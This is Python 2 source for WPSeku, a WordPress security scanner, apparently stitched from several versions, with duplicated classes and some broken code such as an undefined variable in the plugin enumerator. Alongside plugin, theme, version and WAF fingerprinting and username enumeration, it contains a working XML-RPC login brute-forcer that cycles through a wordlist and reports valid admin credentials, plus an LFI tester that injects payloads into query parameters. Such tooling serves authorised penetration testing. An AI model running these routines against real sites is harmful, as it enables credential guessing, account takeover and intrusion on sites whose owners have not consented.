def run(self, content): waf = "" try: if re.search('/wp-content/plugins/wordfence/', content): waf += "Wordfence Security" elif re.search('/wp-content/plugins/bulletproof-security/', content): waf += "BulletProof Security" elif re.search('/wp-content/plugins/sucuri-scanner/', content): waf += "Sucuri Security" elif re.search('/wp-content/plugins/better-wp-security/', content): waf += "Better WP Security" elif re.search('/wp-content/plugins/wp-security-scan/', content): waf += "Acunetix WP SecurityScan" elif re.search( '/wp-content/plugins/all-in-one-wp-security-and-firewall/', content): waf += "All In One WP Security & Firewall" elif re.search('/wp-content/plugins/6scan-protection/', content): waf += "6Scan Security" if waf != "": wpprint.wpprint().plus('Detect firewall: {}'.format(waf)) except Exception, e: pass
class wpplugin: chk = wphttp.UCheck() out = wpprint.wpprint() def __init__(self,agent,proxy,redir,time,url,cookie): self.url = url self.cookie = cookie self.agent = agent self.req = wphttp.wphttp( agent=agent,proxy=proxy, redir=redir,time=time ) def run(self): wpplugin.out.test('Passive enumerate plugins..') try: url = wpplugin.chk.path(self.url,'') resp = self.req.send(url,c=self.cookie) plugins = re.findall(r'/wp-content/plugins/(.+?)/',resp.content) plugin = [] for pl in plugins: if pl not in plugin: plugin.append(pl) if plugin != []: if len(plugin) == 1: wpplugin.out.plus('Name: {}'.format(plugin[0])) self.changelog(plugin[0]) self.fullpathdisc(plugin[0]) self.license(plugin[0]) self.listing(plugin[0]) self.readme(plugin[0]) self.dbwpscan(plugin[0]) elif len(plugin) > 1: for pl in plugin: wpplugin.out.plus('Name: {}'.format(pl)) self.changelog(pl) self.fullpathdisc(pl) self.license(pl) self.listing(pl) self.readme(pl) self.dbwpscan(pl) elif themes == None: wpplugin.out.warning('Not found themes..') except Exception,e: pass
class wpusers: chk = wphttp.UCheck() out = wpprint.wpprint() def __init__(self, agent, proxy, redir, time, url, cookie): self.url = url self.cookie = cookie self.req = wphttp.wphttp(agent=agent, proxy=proxy, redir=redir, time=time) def run(self): wpusers.out.test('Enumerate users..') users = [] df_users = [] for x in range(0, 15): path = "/?author={}".format(str(x)) try: url = wpusers.chk.path(self.url, path) resp = self.req.send(url, c=self.cookie) if resp.status_code == 200: author = re.findall(r'/author/(.+?)/', resp.content) if len(author) == 1: if author[0] not in df_users: df_users.append(author[0]) elif len(author) > 1: for i in author: if i[0] not in df_users: df_users.append(author[0]) except Exception, e: pass for i in df_users: if i not in users: users.append(i) if users != []: for user in xrange(len(users)): if '%20' in users[user][0]: wpusers.out.more(' ID: {} - Login: {}'.format( user, users[user].replace('%20', ' '))) else: wpusers.out.more(' ID: {} - Login: {}'.format( user, users[user])) elif users == None: wpusers.out.warning('Not found users :(')
class wpchangelog: check = wphttp.check() printf = wpprint.wpprint() def __init__(self,agent,proxy,redirect,url): self.url = url self.req = wphttp.wphttp(agent=agent,proxy=proxy,redirect=redirect) def run(self,theme): files = ['changelog.txt','changelog.md','CHANGELOG.md','CHANGELOG.txt'] for i in files: try: url = self.check.checkurl(self.url,'/wp-content/themes/%s/%s'%(theme,i)) resp = self.req.send(url) if resp.read() and resp.getcode() == 200: self.printf.ipri('Changelog: %s'%(url),color="g") except Exception as error: pass
class wpvuln: printf = wpprint.wpprint() def run(self, version): try: v1, v2, v3 = [x.split('.') for x in version][0] self.vers = v1 + v2 + v3 except ValueError: try: v1, v2 = [x.split('.') for x in version][0] self.vers = v1 + v2 except ValueError: self.vers = version[0] try: req = requests.packages.urllib3.disable_warnings() req = requests.get("https://wpvulndb.com/api/v2/wordpresses/" + self.vers, headers={'User-agent': 'Mozilla/5.0'}, verify=False) j = json.loads(req.content) print "" if j[version[0]]["vulnerabilities"]: for x in range(len(j[version[0]]["vulnerabilities"])): self.printf.ipri( "Title: %s" % (j[version[0]]["vulnerabilities"][x]["title"]), color="r") if j[version[0]]["vulnerabilities"][x]["references"]: for z in range( len(j[version[0]]["vulnerabilities"][x] ["references"]["url"])): self.printf.ipri("Reference: %s" % (j[version[0]]["vulnerabilities"] [x]["references"]["url"][z]), color="g") self.printf.ipri( "Fixed in: %s" % (j[version[0]]["vulnerabilities"][x]["fixed_in"]), color="g") print "" else: self.printf.ipri('Not found vulnerabilities', color="g") print "" except Exception as error: pass
class wpxmlrpc: chk = wphttp.UCheck() out = wpprint.wpprint() def __init__(self, agent, proxy, redir, time, url, cookie, wlist, user): self.url = url self.cookie = cookie self.wlist = wlist self.user = user self.req = wphttp.wphttp(agent=agent, proxy=proxy, redir=redir, time=time) def run(self): try: wpxmlrpc.out.plus('Bruteforcing login via xmlrpc..') try: db = open(self.wlist, 'rb') except Exception, e: wpxmlrpc.out.warning(e) dbfiles = [file.split('\n') for file in db] for passwd in dbfiles: payload = """<methodCall><methodName>wp.getUsersBlogs</methodName><params> <param><value><string>""" + self.user + """</string></value></param> <param><value><string>""" + str( passwd[0]) + """</string></value></param></params> </methodCall>""" url = wpxmlrpc.chk.path(self.url, '/xmlrpc.php') resp = self.req.send(url, m="POST", p=payload, c=self.cookie) if re.search('<name>isAdmin</name><value><boolean>0</boolean>', resp._content): wpxmlrpc.out.plus( 'Valid credentials: \"{}\" - \"{}\"'.format( self.user, passwd[0])) elif re.search( '<name>isAdmin</name><value><boolean>1</boolean>', resp.content): wpxmlrpc.out.plus( 'Valid admin credentials: \"{}\" - \"{}\"'.format( self.user, passwd[0])) wpxmlrpc.out.passs() except Exception, e: pass
class wpcrossdomain: check = wphttp.check() printf = wpprint.wpprint() def __init__(self,agent,proxy,redirect,url): self.url = url self.req = wphttp.wphttp(agent=agent,proxy=proxy,redirect=redirect) def run(self): self.printf.test('Checking crossdomain...') try: url = self.check.checkurl(self.url,'crossdomain.xml') resp = self.req.send(url) if resp.read() and resp.getcode() == 200: self.printf.plus('crossdomain.xml available under: %s'%(url)) else: self.printf.erro('crossdomain.xml not available') except Exception as error: pass
class wpxmlrpc: check = wphttp.check() printf = wpprint.wpprint() def __init__(self,agent,proxy,redirect,url): self.url = url self.req = wphttp.wphttp(agent=agent,proxy=proxy,redirect=redirect) def run(self): self.printf.test("Checking xmlrpc...") try: url = self.check.checkurl(self.url,'/xmlrpc.php') resp = self.req.send(url) if resp.read() and resp.getcode() == 405: self.printf.plus('XML-RPC Interface available under: %s'%(url)) else: self.printf.erro('XML-RPC not available') except Exception as error: pass
class wpfpd: check = wphttp.check() printf = wpprint.wpprint() def __init__(self,agent,proxy,redirect,url): self.url = url self.req = wphttp.wphttp(agent=agent,proxy=proxy,redirect=redirect) def run(self): self.printf.test('Checking Full Path Disclosure...') try: url = self.check.checkurl(self.url,'/wp-includes/rss-functions.php') resp = self.req.send(url) if re.search('Fatal error',resp.read()): self.printf.erro('Full Path Disclosure: %s'%(url)) else: self.printf.erro('Full Path Disclosure not available') except Exception as error: pass
class wplicense: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test("Checking license...") try: url = self.check.checkurl(self.url, '/license.txt') resp = self.req.send(url) if resp.read() and resp.getcode() == 200: self.printf.plus('license.txt available under: %s' % (url)) else: self.printf.erro('license.txt not available') except Exception as error: pass
class wpusers: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test("Enumeration usernames...") l = [] for x in range(0, 15): try: url = self.check.checkurl(self.url, '/?author=%s' % x) resp = self.req.send(url) if resp.getcode() == 200: html = resp.read() login = re.findall('/author/(.+?)/', html) l.append(login) except Exception as error: print error login_new = [] for i in l: if i not in login_new: login_new.append(i) ################## try: if login_new != []: for a in range(len(login_new)): if "%20" in login_new[a][0]: self.printf.ipri( " ID: %s | Login: %s" % (a, login_new[a][0].replace('%20', ' ')), color="g") else: self.printf.ipri(" ID: %s | Login: %s" % (a, login_new[a][0]), color="g") print "" if login_new == []: self.printf.ipri("Not found usernames", color="r") except Exception as error: self.printf.ipri("Not found usernames", color="r")
class wplicense: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self, plugin): files = ['license.txt', 'license.md', 'LICENSE.md', 'LICENSE.txt'] for i in files: try: url = self.check.checkurl( self.url, 'wp-content/plugins/%s/%s' % (plugin, i)) resp = self.req.send(url) if resp.read() and resp.getcode() == 200: self.printf.ipri('License: %s' % (url), color="g") except Exception as error: pass
class wpxmlrpc: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url, cookie, wordlist, user): self.url = url self.cookie = cookie self.wordlist = wordlist self.user = user self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test('Starting bruteforce login via xmlrpc...') print "" passwd = open(self.wordlist, "rb") for x in passwd: payload = ( """<methodCall><methodName>wp.getUsersBlogs</methodName><params> <param><value><string>""" + self.user + """</string></value></param> <param><value><string>""" + str(x.split('\n')[0]) + """</string></value></param></params></methodCall>""") self.printf.test("Trying Credentials: \"%s\" - \"%s\"" % (self.user, x.split('\n')[0])) try: url = self.check.checkurl(self.url, 'xmlrpc.php') resp = self.req.send(url, method="POST", payload=payload) html = resp.read() if re.search('<name>isAdmin</name><value><boolean>0</boolean>', html, re.I): self.printf.plus('Valid Credentials: \"%s\" - \"%s\"' % (self.user, x.split('\n')[0])) elif re.search( '<name>isAdmin</name><value><boolean>1</boolean>', html, re.I): self.printf.plus( 'Valid ADMIN Credentials: \"%s\" - \"%s\"' % (self.user, x.split('\n')[0])) break else: self.printf.erro('Invalid Credentials: \"%s\" - \"%s\"' % (self.user, x.split('\n')[0])) except Exception as error: pass
class wploginprotection: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test('Checking wp-login protection...') try: url = self.check.checkurl(self.url, 'wp-login.php') resp = self.req.send(url) if resp.getcode() == 200: self.printf.plus('wp-login not detect protection') elif resp.getcode() == 404: self.printf.erro('wp-login detect protection') except Exception as error: pass
class wpwaf: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test('Checking WAF...') try: url = self.check.checkurl(self.url, "") resp = self.req.send(url) html = resp.read() if re.search('/wp-content/plugins/wordfence/', html): self.printf.plus('Firewall Detection: Wordfence Security') elif re.search('/wp-content/plugins/bulletproof-security/', html): self.printf.plus('Firewall Detection: BulletProof Security') elif re.search('/wp-content/plugins/sucuri-scanner/', html): self.printf.plus('Firewall Detection: Sucuri Security') elif re.search('/wp-content/plugins/better-wp-security/', html): self.printf.plus('Firewall Detection: Better WP Security') elif re.search('/wp-content/plugins/wp-security-scan/', html): self.printf.plus( 'Firewall Detection: Acunetix WP SecurityScan') elif re.search( '/wp-content/plugins/all-in-one-wp-security-and-firewall/', html): self.printf.plus( 'Firewall Detection: All In One WP Security & Firewall') elif re.search('/wp-content/plugins/6scan-protection', html): self.printf.plus('Firewall Detection: 6Scan Security') elif re.search('cloudflare-nginx', resp.info().getheader('server'), re.I): self.printf.plus('Firewall Detection: CloudFlare') elif re.search('__cfduid', resp.info().getheader('cookie'), re.I): self.printf.plus('Firewall Detection: CloudFlare') else: self.printf.erro('No Firewall Detected') except Exception as error: pass
class wprobots: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test("Checking robots...") try: url = self.check.checkurl(self.url, '/robots.txt') resp = self.req.send(url) html = resp.read() if html and resp.getcode() == 200: self.printf.plus('robots.txt available under: %s' % (url)) print "\r\n%s\n" % (html) elif html == "": self.printf.erro('robots.txt not available') except Exception as error: pass
class wpfpd: chk = wphttp.UCheck() out = wpprint.wpprint() def __init__(self,agent,proxy,redir,time,url,cookie): self.url = url self.cookie = cookie self.req = wphttp.wphttp( agent=agent,proxy=proxy, redir=redir,time=time ) def run(self): try: url = wpfpd.chk.path(self.url,'/wp-includes/rss-functions.php') resp = self.req.send(url,c=self.cookie) if resp.status_code == 200 and resp._content != None: if re.search(r'Fatal error',resp._content): wpfpd.out.plus('Full Path Disclosure: {}'.format(resp.url)) except Exception,e: pass
class wplisting: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self, plugin): files = [ "/js", "/css", "/images", "/inc", "/admin", "/src", "/widgets", "/lib", "/assets", "/includes", "/logs", "/vendor", "/core" ] for i in files: try: url = self.check.checkurl( self.url, 'wp-content/plugins/%s/%s' % (plugin, i)) resp = self.req.send(url) if re.search('Index of', resp.read()): self.printf.ipri('Listing: %s' % (url), color="g") except Exception as error: pass
class fingerprint: chk = wphttp.UCheck() out = wpprint.wpprint() def __init__(self, agent, proxy, redir, time, url, cookie): self.url = url self.cookie = cookie self.req = wphttp.wphttp(agent=agent, proxy=proxy, redir=redir, time=time) def run(self): try: resp = self.req.send(self.url, c=self.cookie) server.wpserver().run(resp.headers) waf.wpwaf().run(resp._content) headers.wpheaders().run(resp.headers) wpprint.wpprint().passs() except Exception, e: pass
class wpvuln: printf = wpprint.wpprint() def run(self, plugin): try: req = requests.packages.urllib3.disable_warnings() req = requests.get("https://www.wpvulndb.com/api/v2/plugins/" + plugin, headers={'User-agent': 'Mozilla/5.0'}, verify=False) j = json.loads(req.content, "utf-8") if j[plugin]: if j[plugin]["vulnerabilities"]: for x in range(len(j[plugin]["vulnerabilities"])): print "" self.printf.ipri( 'Title: %s' % (j[plugin]["vulnerabilities"][x]['title']), color="r") if j[plugin]["vulnerabilities"][x]["references"][ "url"]: for z in range( len(j[plugin]["vulnerabilities"][x] ["references"]["url"])): self.printf.ipri('Reference: %s' % (j[plugin]["vulnerabilities"] [x]["references"]["url"][z]), color="g") self.printf.ipri( 'Fixed in: %s' % (j[plugin]["vulnerabilities"][x]["fixed_in"]), color="g") else: self.printf.ipri('Not found vulnerabilities', color="g") else: self.printf.ipri('Not found vulnerabilities', color="g") except Exception as error: self.printf.ipri('Not found vulnerabilities', color="g")
class wplfi: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url, method, payload): self.url = url self.method = method self.payload = payload self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test('Testing LFI vulns...') print "" params = dict([x.split("=") for x in self.payload.split("&")]) param = {} db = open("data/wplfi.txt", "rb") file = [x.split("\n") for x in db] try: for item in params.items(): for x in file: param[item[0]] = item[1].replace(item[1], x[0]) enparam = urllib.urlencode(param) url = self.check.checkurl(self.url, "") resp = self.req.send(url, self.method, enparam) if re.search('define (^\S*)', resp.read()) and resp.getcode() == 200: self.printf.erro( "[%s][%s][vuln] %s" % (resp.getcode(), self.method, resp.geturl())) else: self.printf.plus( "[%s][%s][not vuln] %s" % (resp.getcode(), self.method, resp.geturl())) param[item[0]] = item[1].replace(x[0], item[1]) except Exception as error: pass
class wpxmlrpc: chk = wphttp.UCheck() out = wpprint.wpprint() def __init__(self, agent, proxy, redir, time, url, cookie): self.url = url self.cookie = cookie self.req = wphttp.wphttp(agent=agent, proxy=proxy, redir=redir, time=time) def run(self): try: url = wpxmlrpc.chk.path(self.url, '/xmlrpc.php') resp = self.req.send(url, c=self.cookie) if resp.status_code == 405 and resp._content != None: if resp.url == url: wpxmlrpc.out.plus( 'XML-RPC Interface available under: {}'.format( resp.url)) except Exception, e: pass
class wpfpd: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self, theme): file = [ "/404.php", "/archive.php", "/author.php", "/comments.php", "/footer.php", "/functions.php", "/header.php", "/image.php", "/page.php", "/search.php", "/single.php", "/archive.php" ] for i in file: try: url = self.check.checkurl( self.url, "/wp-content/themes/%s%s" % (theme, i)) resp = self.req.send(url) if re.search('Fatal error', resp.read()): self.printf.ipri('Full Path Disclosure: %s' % (url), color="r") except Exception as error: pass
class wpheaders: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect) def run(self): self.printf.test("Interesting headers...") print "" try: url = self.check.checkurl(self.url, '') r = self.req.send(url) if r.info().getheader('accept-charset'): print 'Accept-Charset: %s' % ( r.info().getheader('accept-charset')) if r.info().getheader('accept-encoding'): print 'Accept-Encoding: %s' % ( r.info().getheader('accept-encoding')) if r.info().getheader('accept-language'): print 'accept-language: %s' % ( r.info().getheader('accept-language')) if r.info().getheader('accept-ranges'): print 'Accept-Ranges: %s' % ( r.info().getheader('accept-ranges')) if r.info().getheader('access-control-allow-credentials'): print 'Access-Control-Allow-Credentials: %s' % ( r.info().getheader('access-control-allow-credentials')) if r.info().getheader('access-control-allow-headers'): print 'Access-Control-Allow-Headers: %s' % ( r.info().getheader('access-control-allow-headers')) if r.info().getheader('access-control-allow-methods'): print 'Access-Control-Allow-Methods: %s' % ( r.info().getheader('access-control-allow-methods')) if r.info().getheader('access-control-allow-origin'): print 'Access-Control-Allow-Origin: %s' % ( r.info().getheader('access-control-allow-origin')) if r.info().getheader('access-control-expose-headers'): print 'Access-Control-Expose-Headers: %s' % ( r.info().getheader('access-control-expose-headers')) if r.info().getheader('access-control-max-age'): print 'Access-Control-Max-Age: %s' % ( r.info().getheader('access-control-max-age')) if r.info().getheader('age'): print 'Age: %s' % (r.info().getheader('age')) if r.info().getheader('allow'): print 'Allow: %s' % (r.info().getheader('allow')) if r.info().getheader('alternates'): print 'Alternates: %s' % (r.info().getheader('alternates')) if r.info().getheader('authorization'): print 'Authorization: %s' % ( r.info().getheader('authorization')) if r.info().getheader('cache-control'): print 'Cache-Control: %s' % ( r.info().getheader('cache-control')) if r.info().getheader('connection'): print 'Connection: %s' % (r.info().getheader('connection')) if r.info().getheader('content-encoding'): print 'Content-Encoding: %s' % ( r.info().getheader('content-encoding')) if r.info().getheader('content-language'): print 'Content-Language: %s' % ( r.info().getheader('content-language')) if r.info().getheader('content-length'): print 'Content-Length: %s' % ( r.info().getheader('content-length')) if r.info().getheader('content-location'): print 'Content-Location: %s' % ( r.info().getheader('content-location')) if r.info().getheader('content-md5'): print 'Content-md5: %s' % (r.info().getheader('content-md5')) if r.info().getheader('content-range'): print 'Content-Range: %s' % ( r.info().getheader('content-range')) if r.info().getheader('content-security-policy'): print 'Content-Security-Policy: %s' % ( r.info().getheader('content-security-policy')) if r.info().getheader('content-security-policy-report-only'): print 'Content-Security-Policy-Report-Only: %s' % ( r.info().getheader('content-security-policy-report-only')) if r.info().getheader('content-type'): print 'Content-Type: %s' % (r.info().getheader('content-type')) if r.info().getheader('dasl'): print 'Dasl: %s' % (r.info().getheader('dasl')) if r.info().getheader('date'): print 'Date: %s' % (r.info().getheader('date')) if r.info().getheader('dav'): print 'Dav: %s' % r.info().getheader('dav') if r.info().getheader('etag'): print 'Etag: %s' % (r.info().getheader('etag')) if r.info().getheader('from'): print 'From: %s' % (r.info().getheader('from')) if r.info().getheader('host'): print 'Host: %s' % (r.info().getheader('host')) if r.info().getheader('keep-alive'): print 'Keep-Alive: %s' % (r.info().getheader('keep-alive')) if r.info().getheader('last-modified'): print 'Last-Modified: %s' % ( r.info().getheader('last-modified')) if r.info().getheader('location'): print 'Location: %s' % (r.info().getheader('location')) if r.info().getheader('max-forwards'): print 'Max-Forwards: %s' % (r.info().getheader('max-forwards')) if r.info().getheader('persistent-auth'): print 'Persistent-Auth: %s' % ( r.info().getheader('persistent-auth')) if r.info().getheader('pragma'): print 'Pragma: %s' % (r.info().getheader('pragma')) if r.info().getheader('proxy-authenticate'): print 'Proxy-Authenticate: %s' % ( r.info().getheader('proxy-authenticate')) if r.info().getheader('proxy-authorization'): print 'Proxy-Authorization: %s' % ( r.info().getheader('proxy-authorization')) if r.info().getheader('proxy-connection'): print 'Proxy-Connection: %s' % ( r.info().getheader('proxy-connection')) if r.info().getheader('public'): print 'Public: %s' % (r.info().getheader('public')) if r.info().getheader('range'): print 'Range: %s' % (r.info().getheader('range')) if r.info().getheader('referer'): print 'Referer: %s' % (r.info().getheader('referer')) if r.info().getheader('server'): print 'Server: %s' % (r.info().getheader('server')) if r.info().getheader('set-cookie'): print 'Set-Cookie: %s' % (r.info().getheader('set-cookie')) if r.info().getheader('status'): print 'Status: %s' % (r.info().getheader('status')) if r.info().getheader('strict-transport-security'): print 'Strict-Transport-Security: %s' % ( r.info().getheader('strict-transport-security')) if r.info().getheader('transfer-encoding'): print 'Transfer-Encoding: %s' % ( r.info().getheader('transfer-encoding')) if r.info().getheader('upgrade'): print 'Upgrade: %s' % (r.info().getheader('upgrade')) if r.info().getheader('vary'): print 'Vary: %s' % (r.info().getheader('vary')) if r.info().getheader('via'): print 'Via: %s' % (r.info().getheader('via')) if r.info().getheader('warning'): print 'Warning: %s' % (r.info().getheader('warning')) if r.info().getheader('www-authenticate'): print 'www-Authenticate: %s' % ( r.info().getheader('www-authenticate')) if r.info().getheader('x-content-security-policy'): print 'X-Content-Security-Policy: %s' % ( r.info().getheader('x-content-security-policy')) if r.info().getheader('x-content-type-options'): print 'X-Content-Type-Options: %s' % ( r.info().getheader('x-content-type-options')) if r.info().getheader('x-frame-options'): print 'X-Frame-Options: %s' % ( r.info().getheader('x-frame-options')) if r.info().getheader('x-id'): print 'X-Id: %s' % (r.info().getheader('x-id')) if r.info().getheader('x-mod-pagespeed'): print 'X-Mod-Pagespeed: %s' % ( r.info().getheader('x-mod-pagespeed')) if r.info().getheader('x-pad'): print 'X-Pad: %s' % (r.info().getheader('x-pad')) if r.info().getheader('x-page-speed'): print 'X-Page-Speed: %s' % (r.info().getheader('x-page-speed')) if r.info().getheader('x-permitted-cross-domain-policies'): print 'X-Permitted-Cross-Domain-Policies: %s' % ( r.info().getheader('x-permitted-cross-domain-policies')) if r.info().getheader('x-pingback'): print 'X-Pingback: %s' % (r.info().getheader('x-pingback')) if r.info().getheader('x-powered-by'): print 'X-Powered-By: %s' % (r.info().getheader('x-powered-by')) if r.info().getheader('x-robots-tag'): print 'X-Robots-Tag: %s' % (r.info().getheader('x-robots-tag')) if r.info().getheader('x-ua-compatible'): print 'X-UA-Compatible: %s' % ( r.info().getheader('x-ua-compatible')) if r.info().getheader('x-varnish'): print 'X-Varnish: %s' % (r.info().getheader('x-varnish')) if r.info().getheader('x-xss-protection'): print 'X-XSS-Protection: %s' % ( r.info().getheader('x-xss-protection')) except Exception as error: pass print ""
class wptheme: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wpch = wpchangelog.wpchangelog(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wpfpd = wpfpd.wpfpd(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wpli = wplicense.wplicense(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wplis = wplisting.wplisting(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wprea = wpreadme.wpreadme(agent=agent, proxy=proxy, redirect=redirect, url=url) self.wpst = wpstyle.wpstyle(agent=agent, proxy=proxy, redirect=redirect, url=url) def run(self): self.printf.test('Enumeration themes...') try: url = self.check.checkurl(self.url, '') resp = self.req.send(url) theme = re.findall('/wp-content/themes/(.+?)/', resp.read()) new = [] for i in theme: if i not in new: new.append(i) if new != []: for c in range(len(new)): print "" self.printf.ipri('Name: %s' % (new[c]), color="g") self.info(new[c]) self.wpst.run(new[c]) self.wpch.run(new[c]) self.wpfpd.run(new[c]) self.wpli.run(new[c]) self.wplis.run(new[c]) self.wprea.run(new[c]) wpvuln().run(new[c]) print "" else: self.printf.ipri('Not found themes', color="g") except Exception as error: pass def info(self, theme): try: url = self.check.checkurl( self.url, "/wp-content/themes/%s/%s" % (theme, "style.css")) resp = self.req.send(url) html = resp.read() self.printf.ipri('Theme Name: %s' % (re.findall("Theme Name: (\w+)", html)[0]), color="g") self.printf.ipri('Theme URL: %s' % (re.findall("Theme URI: (\S+)", html)[0]), color="g") self.printf.ipri('Author: %s' % (re.findall("Author: (\S+)", html)[0]), color="g") self.printf.ipri('Author URL: %s' % (re.findall("Author URI: (\S+)", html)[0]), color="g") self.printf.ipri( 'Version: %s' % (re.findall("Version: (\d+.\d+[.\d+]*)", html)[0]), color="g") except Exception as error: pass
class wpversion: check = wphttp.check() printf = wpprint.wpprint() def __init__(self, agent, proxy, redirect, url): self.url = url self.req = wphttp.wphttp(agent=agent, redirect=redirect, proxy=proxy) def run(self): self.printf.test('Checking wordpress version...') try: url = self.check.checkurl(self.url, 'wp-links-opml.php') resp = self.req.send(url) vers = re.findall('\S+WordPress/(\d+.\d+[.\d+]*)', resp.read()) if vers: self.printf.plus('Running WordPress version: %s' % (vers[0])) wpvuln().run(vers) except Exception as error: print error try: url = self.check.checkurl(self.url, 'feed') resp = self.req.send(url) vers = re.findall('\S+?v=(\d+.\d+[.\d+]*)', resp.read()) if vers: self.printf.plus('Running WordPress version: %s' % (vers[0])) self.wpvuln().run(vers) except Exception as error: try: url = self.check.checkurl(self.url, '/feed/atom') resp = self.req.send(url) vers = re.findall( '<generator uri="http://wordpress.org/" version="(\d+\.\d+[\.\d+]*)"', resp.read()) if vers: self.printf.plus('Running WordPress version: %s' % (vers[0])) self.wpvuln().run(vers) except Exception as error: try: url = self.check.checkurl(self.url, '/feed/rdf') resp = self.req.send(url) vers = re.findall('\S+?v=(\d+.\d+[.\d+]*)', resp.read()) if vers: self.printf.plus('Running WordPress version: %s' % (vers[0])) self.wpvuln().run(vers) except Exception as error: try: url = self.check.checkurl(self.url, '/comments/feed') resp = self.req.send(url) vers = re.findall('\S+?v=(\d+.\d+[.\d+]*)', resp.read()) if vers: self.printf.plus( 'Running WordPress version: %s' % (vers[0])) self.wpvuln().run(vers) except Exception as error: try: url = self.check.checkurl( self.url, 'readme.html') resp = self.req.send(url) vers = re.findall( '.*wordpress-logo.png" /></a>\n.*<br />.* (\d+\.\d+[\.\d+]*)\n</h1>', resp.read()) if vers: self.printf.plus( 'Running WordPress version: %s' % (vers[0])) self.wpvuln().run(vers) except Exception as error: try: url = self.check.checkurl(self.url, '') resp = self.req.send(url) vers = re.findall( '<meta name="generator" content="WordPress (\d+\.\d+[\.\d+]*)"', resp.read()) if vers: self.printf.plus( 'Running WordPress version: %s' % (vers[0])) self.wpvuln().run(vers) except Exception as error: self.printf.erro( 'Not found running WordPress version')
class wptheme: chk = wphttp.UCheck() out = wpprint.wpprint() def __init__(self,agent,proxy,redir,time,url,cookie,result): self.url = url self.result = result self.cookie = cookie self.agent = agent self.req = wphttp.wphttp( agent=agent,proxy=proxy, redir=redir,time=time ) def run(self): wptheme.out.test('Passive enumerate themes..') try: url = wptheme.chk.path(self.url,'') resp = self.req.send(url,c=self.cookie) theme = re.findall(r'/wp-content/themes/(.+?)/',resp.content) themes = [] self.result.themes = [] for th in theme: if th not in themes: themes.append(th) if themes != []: if len(themes) == 1: wptheme.out.plus('Name: {}'.format(themes[0])) obj = type('', (), {})() obj.name = themes[0] self.info(themes[0]) self.style(themes[0]) self.changelog(themes[0], obj) self.fullpathdisc(themes[0]) self.license(themes[0]) self.listing(themes[0]) self.readme(themes[0], obj) self.dbwpscan(themes[0], obj) self.result.themes.append(vars(obj)) elif len(themes) > 1: for theme in themes: wptheme.out.plus('Name: {}'.format(theme)) obj = type('', (), {})() obj.name = theme self.info(theme) self.style(theme) self.changelog(theme, obj) self.fullpathdisc(theme) self.license(theme) self.listing(theme) self.readme(theme, obj) self.dbwpscan(theme, obj) self.result.themes.append(vars(obj)) else: wptheme.out.warning('Not found themes..') except Exception,e: pass
class WPSeku(object): """docstring for WPSeku""" r = wpcolor.wpcolor().red(1) w = wpcolor.wpcolor().white(0) y = wpcolor.wpcolor().yellow(4) e = wpcolor.wpcolor().reset() xss = False sql = False lfi = False brute = False agent = "" proxy = None redirect = True cookie = None user = None method = None query = None wordlist = None check = wphttp.check() printf = wpprint.wpprint() _ = wpall.wpall() def __init__(self, kwargs): self.kwargs = kwargs def Banner(self): print self.r + r"__ ______ ____ _ " + self.e print self.r + r"\ \ / / _ \/ ___| ___| | ___ _ " + self.e print self.r + r" \ \ /\ / /| |_) \___ \ / _ \ |/ / | | |" + self.e print self.r + r" \ V V / | __/ ___) | __/ <| |_| |" + self.e print self.r + r" \_/\_/ |_| |____/ \___|_|\_\\__,_|" + self.e print self.w + " " + self.e print self.w + "|| WPSeku - Wordpress Security Scanner " + self.e print self.w + "|| Version 0.2.1 " + self.e print self.w + "|| Momo Outaadi (M4ll0k) " + self.e print self.w + "|| %shttps://github.com/m4ll0k/WPSeku%s\n" % (self.y, self.e) def Usage(self, ext=False): path = os.path.basename(sys.argv[0]) self.Banner() print "Usage: ./%s [--target|-t] http://localhost\n" % path print "\t-t --target\tTarget URL (eg: http://localhost)" print "\t-x --xss\tTesting XSS vulns" print "\t-s --sql\tTesting SQL vulns" print "\t-l --lfi\tTesting LFI vulns" print "\t-q --query\tTestable parameters (eg: \"id=1&test=1\")" print "\t-b --brute\tBruteforce login via xmlrpc" print "\t-u --user\tSet username, default=admin" print "\t-p --proxy\tSet proxy, (host:port)" print "\t-m --method\tSet method (GET/POST)" print "\t-c --cookie\tSet cookies" print "\t-w --wordlist\tSet wordlist" print "\t-a --agent\tSet user-agent" print "\t-r --redirect\tRedirect target url, default=True" print "\t-h --help\tShow this help and exit\n" print "Examples:" 